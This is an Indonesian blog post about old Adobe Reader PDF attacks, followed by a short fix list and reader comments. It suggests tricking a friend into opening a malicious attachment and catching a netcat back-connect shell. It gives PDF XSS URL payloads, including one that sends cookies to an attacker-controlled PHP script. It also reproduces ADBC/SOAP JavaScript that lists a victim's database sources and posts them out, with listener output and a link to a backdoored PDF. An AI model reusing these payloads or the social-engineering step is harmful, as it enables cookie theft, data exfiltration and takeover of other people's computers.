Hati-hati dokumen pdf bisa menguasai komputer anda


Beberapa waktu lalu orang terheran-heran karena beredarnya virus yang berekstensi *.jpg atau *.jpeg yang merupakan ekstension file gambar, dengan memanfaatkan bugs windows di file library gdi32.dll yang menghandle file-file grafik, dan sangat banyak orang tertipu dan media penyebaran mudah dilakukan, seperti dalam mengirim email dengan meng-attach file virus yang sudah anda modifikasi tersebut ke dalam email yang akan anda kirim ke teman anda dengan subjek “Foto bugil Dewi Persik” tanpa menunggu 1 detik pun teman anda langsung membuka attachment tersebut, lalu anda sudah bisa menguasai komputernya dengan teknik “remote connect backshell” dengan bantuan perintah $ nc -v -l -p 1313

Saat ini file pdf yang bisa kita gunakan dalam sehari-hari bisa dijadikan senjata untuk menguasai komputer kita secara remote, (eh sebenarnya udah lama juga si, tapi ada yang belum tahu mungkin🙂 ) dengan beberapa metode seperti xss, dan memodifikasi file pdf, dengan memberikan url ke dalam tubuh dile pdf yang bertujuan menjalankan evil code pada saat file pdf dibuka. di bawah ini beberapa browser yang vurnerable untuk eksploitasi, ;

IE 6 SP 1 dengan Acro Reader versi < 8.0
Firefox 2.0.0.1 win32
Firefox 1.5.0.8 win32
Opera 8.5.4 build 770 win32
Opera 9.10.8679 win32

Not Vulnerable:
IE7.0 win32

Proof of Concept

Metode pertama :

XSS Kepanjangan dari Cross Site Scripting yaitu sebuah teknik yang dapat mengeksploitasi aplikasi berbasis web yang mengijinkan kepada kita untuk menjalankan script seperti javascript dalam rangka mewujudkan bangsa Indonesia yang sejahtera, makmur, dan adil bagi setiap insan di negeri ini !!!,, loh-loh kok malah pidato kampanye ??? salah-salah😦 jadi, teknik XSS dijalankan di aplikasi web yang vurnerable.Adobe secara default mengaktifkan javascript, akibat dari XSS ini bisa berakibatnya
pencurian identitas atau cookie stealing.

file pdf pun terkena dampak dari teknik ini,

formulanya seperti ini ;

http://%5BURL%5D/%5BFILENAME%5D.pdf#something=javascript:alert(123);

contoh ;

http://www.microsoft.com/windows2000/docs/TCO.pdf#something=javascript:alert(123);

efeknya adalah muncul kotak dialog dengan pesan 123, yang menandakan rentan dengan serangan XSS, sangat berbahaya jika attacker memanfaatkan ini untuk melakukan cookie stealing, seperti ini,

http://www.gombel.com/doc/dokumen.pdf#cobain=javascript:void(document.location=’http://situsgue.com/ambil.php?cookie=’+document.cookie)”&gt;

sintaks di atas akan mengambil cookie, dan dicatat ke dalam server si attacker.

Metode kedua :

Metode kedua dengan memanfaatkan Adobe’s ADBC (Adobe Database Connectivity) dan Web Service Support. Koding yang Michael Daw’s di bawah ini berfungsi mengakses Wind*** ODBC (duh wind*** lagi kena sasaran), yang dapat mengeksplorasi isi database dan mengirimkan informasi ke “localhost” via web service.

var cURL = “http://localhost/&#8221;;
var cTestString = “”;

var databaseList = ADBC.getDataSourceList();

var DB = “”;
if (databaseList != null) {
for (var i=0; i<databaseList.length ; i++)
DB+=databaseList[i].name;
}

cTestString = DB;

var response = SOAP.request( {
cURL: cURL,
oRequest: {
http://myxmlns/:echoString&#8221;: {
inputString: cTestString
}
},
cAction: “http://additional-opt/&#8221;
});

var result = response[“http://no-need/:echoStringResponse”%5D%5B“return”%5D;

Lalu di mesin kita ;

$ ./nc.exe -l -p 80 -v
listening on [any] 80 …
connect to [127.0.0.1] from localhost [127.0.0.1] 1924
POST / HTTP/1.1
Accept: */*
Content-Type: text/xml; charset=UTF-8
SOAPAction: “http://additional-opt/&#8221;
Content-Length: 578
User-Agent: Mozilla/3.0 (compatible; Acrobat SOAP 7.0)
Host: localhost
Connection: Keep-Alive
Cache-Control: no-cache

<?xml version=”1.0″?>
<SOAP-ENV:Envelope xmlns:SOAP-ENC=”http://schemas.xmlsoap.org/soap/encoding/&#8221; xm
lns:SOAP-ENV=”http://schemas.xmlsoap.org/soap/envelope/&#8221; xmlns:xsd=”http://www.w
3.org/2001/XMLSchema” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance”><SOA
P-ENV:Body><ns0:echoString SOAP-ENV:encodingStyle=”http://schemas.xmlsoap.org/so
ap/encoding/” xmlns:ns0=”http://myxmlns/”><inputString xsi:type=”xsd:string”>MS
Access 97 DatabaseFoxPro FilesText FilesMS Access DatabaseExcel FilesdBASE Files
dbase1</inputString>
</ns0:echoString>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

http://michaeldaw.org/projects/backdoored2.pdf <- Download PDF yang sudah dimodifikasi untuk metode ke-2</a>

Solution :
– Gunakan Foxit reader untuk membuka format file pdf.
– Gunakan Adobe Acrobat versi 8.0 ke atas.
– Update software anda.
– Use tux

Reference ;
http://www.adobe.com/support/security/advisories/apsa07-01.html
http://michaeldaw.org/news/news-040106

12 thoughts on “Hati-hati dokumen pdf bisa menguasai komputer anda

  1. waduhh,, jadi ngeri. serius. nampaknya kompuku udah kena virus *coz USB-ku terlihat ada virus ketika di-check di kompu&laptop teman. tp entah, alhamdulillah, sampe sekarang samsih lancar dan cepat loadingnya.

  2. 🙂 hmm, makannya hati-hati mas,, update selalu antivirusnya, untuk meminimalisir datang virus,, dan pakai jaket kalo musim ujan, biar gak kena virus juga.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s